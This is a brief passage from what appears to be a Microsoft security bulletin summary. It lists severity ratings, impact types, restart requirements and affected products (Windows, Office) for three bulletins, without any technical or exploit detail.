Important -3-

Bulletin 4
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Bulletin 6
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

//